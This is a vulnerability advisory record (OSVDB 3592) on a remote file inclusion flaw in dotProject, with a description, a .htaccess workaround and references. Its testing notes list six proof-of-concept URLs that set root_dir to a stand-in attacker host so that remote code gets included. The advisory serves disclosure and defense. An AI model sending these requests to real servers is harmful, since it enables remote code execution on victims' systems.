dotProject classdefs/date.php $root_dir Arbitrary File Include

2003-01-29T00:00:00
ID OSVDB:3592
Type osvdb
Reporter OSVDB
Modified 2003-01-29T00:00:00

Description

Vulnerability Description

dotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: create a .htaccess file that contains 'Deny from all' in the /modules/ directory.

Short Description

dotProject contains a flaw that allows a remote attacker to include arbitrary files. The issue is due to numerous scripts that call the classdefs/date.php script without defining or restricting the $root_dir variable. This allows an attacker to set the variable to an arbitrary server/path/file name which may include malicious commands that would be executed on the vulnerable server.

Manual Testing Notes

http://[victim]/dotproject/modules/files/index_table.php?root_dir=http://attacker http://[victim]/dotproject/modules/projects/addedit.php?root_dir=http://attacker http://[victim]/dotproject/modules/projects/view.php?root_dir=http://attacker http://[victim]/dotproject/modules/projects/vw_files.php?root_dir=http://attacker http://[victim]/dotproject/modules/tasks/addedit.php?root_dir=http://attacker http://[victim]/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker

References:

Vendor URL: http://www.dotproject.net/ Secunia Advisory ID:7974 Related OSVDB ID: 3593 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-01/0344.html ISS X-Force ID: 11192 Bugtraq ID: 6710